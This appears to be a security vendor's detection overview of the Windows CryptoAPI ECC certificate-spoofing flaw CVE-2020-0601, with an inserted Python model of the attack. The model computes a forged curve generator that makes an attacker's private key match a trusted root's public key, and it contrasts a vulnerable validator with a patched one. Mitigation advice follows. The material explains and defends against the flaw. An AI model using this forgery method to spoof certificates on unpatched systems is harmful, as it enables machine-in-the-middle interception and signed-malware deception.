
DETECTION OVERVIEW

Windows CryptoAPI ECC Validation Vulnerability - CVE-2020-0601

Risk Factors

On an unpatched system, any Windows application that relies on CryptoAPI (crypt32.dll) for certificate chain validation accepts a spoofed ECC certificate as if it chained to a trusted root. An attacker creates the spoofed certificate by encoding explicit, attacker-chosen elliptic curve parameters (instead of a named curve) in a CA certificate whose public key is identical to a trusted root's public key, while the corresponding private key is one the attacker controls. Any client that validates a chain through that spoofed CA certificate, whether for TLS, signed executables or signed files, can be exposed to machine-in-the-middle (MITM) attacks.

Kill Chain

Exploitation

Risk Score

65


Attack Background

CryptoAPI, the Windows application programming interface for validating certificates, has a vulnerability that enables an attacker to spoof a CA certificate within a certificate chain. Specifically, the attacker starts from the public key of a trusted ECC root certificate, picks a private key of their own, and constructs an explicit ECC parameter set whose generator point is chosen so that the attacker's private key yields exactly that trusted public key. When the spoofed certificate is presented, Windows matches it to the trusted root held in its in-memory certificate cache by public key alone and does not check that the certificate's explicit curve parameters match those of the cached certificate, so signatures made with the attacker's private key are accepted as though they were made by the trusted root.
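The forgery described in Risk Factors and Attack Background, as an added worked example that is not ExtraHop's or Microsoft's code: a pure-Python model of P-256 in which a "trusted root" is a public key Q, the attacker forges explicit curve parameters with generator G' = d'^-1 · Q for a private key d' of their own choosing (so that d' · G' = Q), and two constructed chain validators show that matching on public key alone (the unpatched behaviour) accepts the forged CA while also comparing the curve parameters rejects it. The P-256 constants are the standard FIPS 186-4 values; the two private keys, the dictionary representation of a "certificate" (public key plus parameters) and the validator functions are assumptions made for illustration.

```python
"""Constructed model of the CVE-2020-0601 key-match flaw on P-256 (illustration only)."""

# Standard P-256 (secp256r1) domain parameters from FIPS 186-4.
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
G = (0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296,
     0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5)
N = 0xffffffff00000000ffffffffffffffffbce6faada7179e84f3b9cac2fc632551
STANDARD_PARAMS = {"p": P, "a": A, "b": B, "G": G, "n": N}


def on_curve(pt):
    """True if pt is the point at infinity (None) or satisfies y^2 = x^3 + ax + b (mod p)."""
    if pt is None:
        return True
    x, y = pt
    return (y * y - (x * x * x + A * x + B)) % P == 0


def ec_add(p1, p2):
    """Affine point addition on the curve; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    x1, y1 = p1
    x2, y2 = p2
    if x1 == x2 and (y1 + y2) % P == 0:      # p1 == -p2
        return None
    if p1 == p2:                              # doubling
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return (x3, (lam * (x1 - x3) - y1) % P)


def ec_mul(k, pt):
    """Scalar multiplication k*pt by double-and-add (not constant-time; demo only)."""
    result, addend = None, pt
    while k:
        if k & 1:
            result = ec_add(result, addend)
        addend = ec_add(addend, addend)
        k >>= 1
    return result


def forge_parameters(trusted_pubkey, attacker_priv):
    """Explicit parameters with generator G' = d'^-1 * Q, so that d' * G' == Q.

    Everything except the generator is copied from the real curve, so the
    trusted public key still lies on the forged curve.
    """
    inv = pow(attacker_priv, -1, N)
    return {"p": P, "a": A, "b": B, "G": ec_mul(inv, trusted_pubkey), "n": N}


def vulnerable_chain_check(presented_ca, trusted_roots):
    """Unpatched behaviour: trust the presented CA if its public key matches a cached root."""
    return any(presented_ca["pubkey"] == root["pubkey"] for root in trusted_roots)


def fixed_chain_check(presented_ca, trusted_roots):
    """Patched behaviour: the public key AND the curve parameters must both match."""
    return any(presented_ca["pubkey"] == root["pubkey"]
               and presented_ca["params"] == root["params"]
               for root in trusted_roots)


# Constructed private keys (arbitrary non-zero scalars below N), not real key material.
ROOT_PRIV = 0x7a1b2c3d4e5f60718293a4b5c6d7e8f90a1b2c3d4e5f60718293a4b5c6d7e8f9
ATTACKER_PRIV = 0x0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef


def demo(root_priv=ROOT_PRIV, attacker_priv=ATTACKER_PRIV):
    """Run the forgery against one trusted root and report what each validator decides."""
    root_pub = ec_mul(root_priv, G)
    trusted_root = {"pubkey": root_pub, "params": STANDARD_PARAMS}
    forged = forge_parameters(root_pub, attacker_priv)
    spoofed_ca = {"pubkey": ec_mul(attacker_priv, forged["G"]), "params": forged}
    return {
        "pubkey_matches": spoofed_ca["pubkey"] == root_pub,
        "forged_generator_on_curve": on_curve(forged["G"]),
        "forged_generator_differs": forged["G"] != G,
        "vulnerable_accepts": vulnerable_chain_check(spoofed_ca, [trusted_root]),
        "fixed_accepts": fixed_chain_check(spoofed_ca, [trusted_root]),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

A real exploit additionally encodes the forged parameters as an explicit ECParameters structure inside the spoofed certificate's SubjectPublicKeyInfo and signs a leaf certificate with the attacker's private key; the model keeps only the two fields the matching logic compares. The fixed validator here compares the whole parameter set, which is what makes the forged generator detectable; rejecting explicit parameters altogether in favour of named curves is the stricter policy.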

Mitigation Options

Install the Microsoft security update for CVE-2020-0601 (released in January 2020; affected platforms are Windows 10 and Windows Server 2016/2019) on all affected Windows servers, appliances, endpoints, and proxies that perform TLS validation. Once the patch is installed, crypt32.dll writes an event to the Application log (source Microsoft-Windows-Audit-CVE, Event ID 1) whenever it encounters a certificate that attempts to exploit this vulnerability, which can be used to confirm that exploitation was attempted against a patched host.

MITRE ATT&CK ID
